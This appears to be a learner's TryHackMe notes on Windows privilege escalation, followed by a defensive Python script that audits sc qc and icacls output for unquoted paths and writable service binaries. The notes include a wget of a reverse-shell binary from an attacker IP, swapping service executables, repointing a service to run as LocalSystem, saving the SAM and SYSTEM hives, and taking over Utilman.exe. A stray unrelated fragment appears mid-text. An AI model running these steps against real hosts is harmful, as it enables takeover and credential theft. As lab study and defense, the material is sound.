# Windows Privilege

###### tags: `tryhackme` `windows` `privilege`

[TOC]

# Insecure permissions

```
sc qc WindowsScheduler
```

Check the file permissions of the service binary.

```
icacls <file name>
```

- Everyone can modify
- So we could try to replace the associated executable with our reverse shell

Download the reverse shell:

```
wget http://10.17.11.72:8000/rev-svc.exe -O rev-svc.exe
```

---

## Trigger

### PowerShell

```
sc.exe stop windowsscheduler
```

```
sc.exe start windowsscheduler
```

### CMD

## Unquoted Service Paths

---

### Practice

---

Check permissions.

AD (Administrative Privileges), WD (Windows Privileges)

```
mv .\rev-svc2.exe C:\MyPrograms\Disk.exe
# set permissions on the dropped binary
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"
```

## Insecure service permissions

Check: no unquoted-path vulnerability, no writable-executable vulnerability.

## Check the service's configuration permissions

```
PS C:\tools> .\AccessChk\accesschk.exe -qlc thmservice
```

```
PS C:\tools> icacls .\rev-svc3.exe /grant Everyone:F
```

```
PS C:\tools> sc.exe config THMservice binPath= "C:\tools\rev-svc3.exe" obj=LocalSystem
```

---

# Dangerous privileges

## SeBackup/SeRestore

```
# back up the SYSTEM hive
reg save hklm\system C:\Users\THMBackup\system.hive
# back up the SAM hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
```

## SeTakeOwnership

```
whoami /priv
```

Abuse `utilman.exe`

utilman.exe runs with SYSTEM privileges, so if we replace the original binary with cmd.exe we get SYSTEM privileges.

```
takeown /f C:\Windows\System32\Utilman.exe
```

---

Assign full permissions to us:

```
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
```

not return all installed programs
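An added audit script (written for this note, not code from the TryHackMe room) that flags, from saved `sc qc` and `icacls` output, the two service weaknesses the note above relies on: unquoted service paths containing spaces, and service binaries that Everyone or Users can modify. The service names, paths and ACLs are constructed samples, and the low-privilege principal list and write-rights set are assumptions; a defender can run the same checks over real output to find these before a binary gets swapped.

```python
import re
# Constructed sample in the shape printed by `sc qc <service>`; not real hosts.
SC_QC = {
    "WindowsScheduler": "SERVICE_NAME: WindowsScheduler\n"
        "        BINARY_PATH_NAME   : C:\\PROGRA~2\\SYSTEM~1\\WService.exe\n",
    "disksorter": "SERVICE_NAME: disksorter\n"
        "        BINARY_PATH_NAME   : C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe\n",
}
# Constructed sample in the shape printed by `icacls <file>`.
ICACLS = {
    "C:\\PROGRA~2\\SYSTEM~1\\WService.exe":
        "C:\\PROGRA~2\\SYSTEM~1\\WService.exe Everyone:(M)\n"
        "                                  NT AUTHORITY\\SYSTEM:(F)\n",
}
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users"}  # assumed list
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}  # icacls rights that allow changing the file
def binary_path(sc_text):
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_text)
    return m.group(1).strip() if m else ""
def exe_path(binpath):
    # Strip quotes and any arguments after the .exe name.
    p = binpath.strip('"')
    return p[:p.lower().find(".exe") + 4] if ".exe" in p.lower() else p
def is_unquoted_with_spaces(binpath):
    # Unquoted with a space before the .exe: the SCM tries each prefix (C:\MyPrograms\Disk.exe, ...) first.
    return not binpath.startswith('"') and " " in exe_path(binpath)
def low_priv_writers(path, icacls_text):
    writers = set()
    for line in icacls_text.splitlines():
        line = line.strip()
        if line.startswith(path):  # icacls prints the path before the first ACE
            line = line[len(path):].strip()
        m = re.fullmatch(r"(.+?):((?:\([^)]*\))+)", line)
        if m:
            rights = {r for g in re.findall(r"\(([^)]*)\)", m.group(2)) for r in g.split(",")}
            if m.group(1).lower() in LOW_PRIV and rights & WRITE_RIGHTS:
                writers.add(m.group(1).lower())
    return writers
def audit(sc_outputs, icacls_outputs):
    findings = {}  # service name -> findings; an empty list means nothing flagged
    for name, text in sc_outputs.items():
        exe = exe_path(binary_path(text))
        issues = []
        if is_unquoted_with_spaces(binary_path(text)):
            issues.append("unquoted service path")
        writers = low_priv_writers(exe, icacls_outputs.get(exe, ""))
        if writers:
            issues.append("binary writable by " + ", ".join(sorted(writers)))
        findings[name] = issues
    return findings
```

Fixes are the usual ones: quote the path in the service configuration (`sc.exe config <svc> binPath= "..."`) and remove modify/full rights for non-admin principals on the binary.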